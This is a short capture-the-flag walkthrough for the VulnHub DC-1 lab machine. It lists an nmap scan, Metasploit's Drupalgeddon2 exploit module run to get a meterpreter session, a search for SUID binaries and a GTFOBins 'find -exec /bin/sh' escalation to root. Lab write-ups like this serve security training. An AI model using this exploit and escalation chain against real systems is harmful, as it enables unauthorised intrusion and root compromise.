Machine Link : https://www.vulnhub.com/entry/dc-1,292/ STEP1 nmap 192.168.0.104 -sSV -Pn -A FINDING PORT 80 IS OPEN ----------------------------------------------------------------------------------------------------------- STEP2 BROWES THE SITE OPEN MSFCONSOLE SEARCH FOR search exploit drupal msf6 exploit(unix/webapp/drupal_drupalgeddon2) options SET RHOSTS SET TARGETURI /user RUN meterpreter ls -la GET PREV ESEC find / -user root -perm -4000 -exec ls -ldb {} \; GO TO GTFOBIN AND SEARCH FOR find AND GET SHELL CODE https://gtfobins.github.io/gtfobins/find/#shell find . -exec /bin/sh \; -quit whoami root